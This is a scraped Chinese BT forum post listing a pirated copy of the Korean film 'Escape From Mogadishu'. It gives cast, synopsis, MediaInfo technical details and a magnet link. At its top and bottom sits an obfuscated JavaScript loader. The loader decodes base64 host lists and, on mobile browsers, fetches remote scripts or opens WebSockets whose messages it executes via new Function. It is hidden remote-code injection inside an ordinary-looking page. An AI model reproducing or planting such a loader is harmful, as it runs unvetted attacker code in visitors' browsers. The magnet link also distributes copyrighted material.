摩加迪沙[中文字幕].Escape.From.Mogadishu.2021.1080p.WEB-DL.AAC5.1.H264 6.94GB

版主小s 1月前 446

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 摩加迪沙 / 绝路狂逃(港) / 逃出摩加迪休(台) / 摩加迪休 / Mogadishu / Escape from Mogadishu

◎片 名 ????

◎年 代 2021

◎产 地 韩国

◎类 别 剧情 / 惊悚 / 历史

◎语 言 韩语

◎上映日期 2021-07-28(韩国)

◎IMDb链接 https://www.imdb.com/title/tt14810692/

◎豆瓣评分 8.2/10 (2758人评价)

◎豆瓣链接 https://movie.douban.com/subject/33457594/

◎片 长 121分钟

◎导 演 柳昇完 Seung-wan Ryoo (id:1138335)

◎编 剧 柳昇完 Seung-wan Ryoo (id:1138335)

◎演 员 金允石 Yoon-suk Kim (id:1310942)

赵寅成 In-seong Jo (id:1023390)

许峻豪 Jun-ho Heo (id:1287129)

具教焕 Gu Kyohwan (id:1363439)

金素真 So-Jin Kim (id:1348190)

郑满植 Man-shik Jeong (id:1327294)

金在华 Jae-hwa Kim (id:1339671)

朴庆惠 Gyeong-hye Park (id:1378177)

◎标 签 韩国 / 韩国电影 / 真实改编 / 赵寅成 / 动作 / 悬疑 / 金允石 / 趙寅成

◎简 介

赵寅成、金允石或将主演柳昇完([老手])执导的新片[逃离](暂定名)。影片将基于一个从未出现在韩国外交史上的真实故事改编,上世纪90年代,索马里内战爆发,朝鲜和韩国大使馆的外交官变得孤立无援。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 202505180157756914899679040901600589296 (0x9859143BB2F69720EA7FAA9C974935F0)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.93 GiB

  8. Duration : 2 h 1 min

  9. Overall bit rate : 8 193 kb/s

  10. Encoded date : UTC 2021-10-15 03:15:05

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 2 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 2 frames

  21. Format settings, GOP : M=1, N=30

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 1 min

  24. Bit rate mode : Constant

  25. Bit rate : 8 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.161

  36. Stream size : 6.77 GiB (98%)

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : AAC LC SBR

  42. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  43. Commercial name : HE-AAC

  44. Format settings : Implicit

  45. Codec ID : A_AAC-2

  46. Duration : 2 h 1 min

  47. Bit rate : 192 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 23.438 FPS (2048 SPF)

  52. Compression mode : Lossy

  53. Stream size : 166 MiB (2%)

  54. Title : Korean

  55. Language : Korean

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 1 h 52 min

  64. Bit rate : 45 b/s

  65. Count of elements : 1432

  66. Stream size : 37.3 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 1 h 52 min

  77. Bit rate : 45 b/s

  78. Count of elements : 1432

  79. Stream size : 37.4 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : Yes

  83. Forced : No




复制代码


TAGS 剧情 惊悚 历史

磁力链:
  • magnet:?xt=urn:btih:F34984D577979151648892677479D3C43172AC50

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};